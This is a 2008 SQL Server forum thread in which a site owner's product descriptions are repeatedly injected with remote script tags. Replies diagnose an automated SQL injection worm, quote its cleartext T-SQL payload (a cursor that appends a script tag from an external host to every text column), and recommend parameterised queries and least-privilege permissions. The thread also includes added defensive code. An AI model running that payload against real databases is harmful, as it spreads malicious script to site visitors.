SQL Server Forums
SQL Keeps getting hacked
Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 : 07:52:02
I have an ASP website that uses SQL 2005.
For the last 2 nights someone has hacked the DB and added a URL with a script to the end of my product descriptions; the script is located on another server, which is infected with viruses.
For example, a field should read 'Clothing'; when it gets hacked it reads 'Clothing <Script... blah blah here>'.
I have restored the DB each time, but I cannot find how they are doing this. The Windows Firewall is blocking any external SQL connections, so I am guessing there is something local that is doing this.
Any ideas where to look for clues?

Thanks.

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/13/2008 : 07:53:29
SQL Injection will be my first guess.

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 : 08:05:49
quote:
Originally posted by harsh_athalye

SQL Injection will be my first guess.

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"



Ok, not being a SQL expert, can you help me out here, where would I look to find if that is it?

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/13/2008 : 08:15:01
See this on basics of SQL Injection and how to prevent it: http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 : 08:17:04
Ok, thanks v much for that.

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 : 09:57:30
If it is a SQL injection, would that be in a log somewhere?

pootle_flump
Flowing Fount of Yak Knowledge

United Kingdom
1064 Posts

Posted - 05/13/2008 : 11:51:33
Not in any form that you can read as it is. The problem with SQL Injection is that by definition it is not recognised by SQL Server as malicious. If you are concatenating user input into SQL statements for execution then you can be pretty confident this has been done by SQL Injection.

nheidorn
Starting Member

USA
28 Posts

Posted - 05/13/2008 : 12:29:46
Sounds like you might have been hit by the Automated SQL Injection Worm that is going around. You can read more here: http://isc.sans.org/diary.html?storyid=4393.

Rob K
Starting Member

United Kingdom
9 Posts

Posted - 05/13/2008 : 12:38:40
Great, I have blocked the IPs mentioned on that link.

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 : 02:36:08
If you want to protect yourself against SQL injection, use only stored procedures to access the DB. Use parameterised calls in your ASP code. Don't concatenate SQL statements and execute them.
Restrict your database user to have only execute permissions on the stored procs and nothing else.

--
Gail Shaw
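A worked T-SQL version of the least-privilege setup described above, added here as an example and not code from the thread: the database, table, procedure and login names are assumptions, and the password is a placeholder.

```sql
-- Added example (not from the thread). Assumed names: database ShopDB, table dbo.Product
-- with columns ProductId and Description, login web_app used by the ASP site.
USE ShopDB;
GO
-- 1. A dedicated login/user for the web site. It owns nothing and gets no table rights.
CREATE LOGIN web_app WITH PASSWORD = '<placeholder - set a strong password>';
CREATE USER web_app FOR LOGIN web_app;
GO
-- 2. A role that carries only EXECUTE on the procedures the site actually calls.
CREATE ROLE app_exec;
GO
-- The procedure takes a typed parameter; the ASP code passes the value as a parameter,
-- never by building the statement text, so a quote in the input cannot change the query.
CREATE PROCEDURE dbo.GetProductDescription
    @ProductId int
AS
BEGIN
    SET NOCOUNT ON;
    SELECT Description FROM dbo.Product WHERE ProductId = @ProductId;
END;
GO
GRANT EXECUTE ON OBJECT::dbo.GetProductDescription TO app_exec;
EXEC sp_addrolemember 'app_exec', 'web_app';   -- SQL 2005 syntax for role membership
GO
-- 3. Check: every permission held by the user or its role. The only row expected is
-- the EXECUTE grant; any SELECT/UPDATE on a table here means the lock-down is incomplete.
SELECT pr.name AS principal_name, pe.permission_name, pe.state_desc,
       OBJECT_NAME(pe.major_id) AS object_name
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE pr.name IN ('web_app', 'app_exec');
```

With this user the worm's UPDATE against product descriptions fails on permissions even if the injection itself reaches the server.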

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 02:56:00
Where is the post Jeff made where he dissected the binary string into T-SQL?



E 12°55'05.25"
N 56°04'39.16"

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 : 03:58:44
quote:
Originally posted by Peso

Where is the post Jeff made where he dissected the binary string into T-SQL?



If you find it, I'd very much like to see it.

--
Gail Shaw

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 04:16:05
I remember it was something about

SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE Type IN ('VARCHAR', 'CHAR', 'TEXT')



E 12°55'05.25"
N 56°04'39.16"

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 04:23:40
The cleartext code looked similar to this:
DECLARE @T varchar(255),@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****p.js></script>''') 
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor



E 12°55'05.25"
N 56°04'39.16"
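As an added example (not from the thread or the linked post): a read-only scan that walks the same kinds of columns the worm's cursor targeted (xtype 99 ntext, 35 text, 231 nvarchar, 167 varchar, widened here to char and nchar) and counts the rows already carrying an injected script tag, so the damage can be scoped before restoring. The search string is an assumption based on the payload above; the scan itself uses sp_executesql and QUOTENAME so that no user input is ever concatenated.

```sql
-- Added example (not from the thread): count rows per character column that contain
-- the injected tag. Read-only; run against the affected database before restoring.
SET NOCOUNT ON;
DECLARE @Schema sysname, @Table sysname, @Column sysname;
DECLARE @Sql nvarchar(max), @Hits int;
DECLARE @Report TABLE (SchemaName sysname, TableName sysname, ColumnName sysname, RowsHit int);

-- Same column types the worm's cursor selected (text, ntext, varchar, nvarchar) plus
-- char/nchar, taken from INFORMATION_SCHEMA instead of sysobjects/syscolumns.
DECLARE Col_Cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    JOIN INFORMATION_SCHEMA.TABLES AS t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'text', 'nchar', 'nvarchar', 'ntext');

OPEN Col_Cursor;
FETCH NEXT FROM Col_Cursor INTO @Schema, @Table, @Column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers are wrapped in QUOTENAME and the count returns through an OUTPUT
    -- parameter; nothing user-controlled is built into the statement text.
    -- LIKE (unlike CHARINDEX) accepts text/ntext columns without a CAST.
    SET @Sql = N'SELECT @n = COUNT(*) FROM ' + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
             + N' WHERE ' + QUOTENAME(@Column) + N' LIKE ''%<script src=%''';
    EXEC sp_executesql @Sql, N'@n int OUTPUT', @n = @Hits OUTPUT;
    IF @Hits > 0
        INSERT INTO @Report VALUES (@Schema, @Table, @Column, @Hits);
    FETCH NEXT FROM Col_Cursor INTO @Schema, @Table, @Column;
END;
CLOSE Col_Cursor;
DEALLOCATE Col_Cursor;

-- Every column listed needs cleaning or restoring; an empty result after the
-- clean-up is the check that nothing was missed.
SELECT SchemaName, TableName, ColumnName, RowsHit FROM @Report ORDER BY RowsHit DESC;
```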

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 04:27:14
Found the link
http://www.sqlteam.com/forums/topic.asp?TOPIC_ID=101673



E 12°55'05.25"
N 56°04'39.16"

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 : 05:00:52
Hmm. SQL Injection and XSS all in one. Interesting.

Not close to as damaging as it could have been.

--
Gail Shaw

SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 05:07:13
I agree.
The attack could have encrypted all columns!

I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database.
Always use parameterized queries as a first line of defence.




E 12°55'05.25"
N 56°04'39.16"

Byapti
Starting Member

1 Posts

Posted - 05/14/2008 : 05:53:48
Hi,

I think the “Testing For SQL Injections” article on http://www.stickyminds.com/sitewide.asp?Function=edetail&ObjectType=ART&ObjectId=11923&tth=DYN&tt=siteemail&iDyn=2 may be helpful in this discussion.

This popular white paper is written by a software engineer from our organization Mindfire Solutions (http://www.mindfiresolutions.com).

I hope you find it useful!

Cheers,
Byapti



SwePeso
Patron Saint of Lost Yaks

Sweden
29910 Posts

Posted - 05/14/2008 : 06:03:24
Is it really "a vulnerability at database layer"?
The database is just performing what the front-end application tells it to.



E 12°55'05.25"
N 56°04'39.16"

GilaMonster
Flowing Fount of Yak Knowledge

South Africa
4507 Posts

Posted - 05/14/2008 : 07:47:36
quote:
Originally posted by Peso


I hope this teaches all newbies, noobs and beginners to NEVER EVER concatenate strings to send to the database.
Always use parameterized queries as a first line of defence.



Considering all the posts here and on Central in the last couple weeks, I somehow doubt it.

--
Gail Shaw

Edited by - GilaMonster on 05/14/2008 08:04:28

harsh_athalye
Flowing Fount of Yak Knowledge

India
5509 Posts

Posted - 05/14/2008 : 07:59:37
Only experience can teach them then!

Harsh Athalye
India.
"The IMPOSSIBLE is often UNTRIED"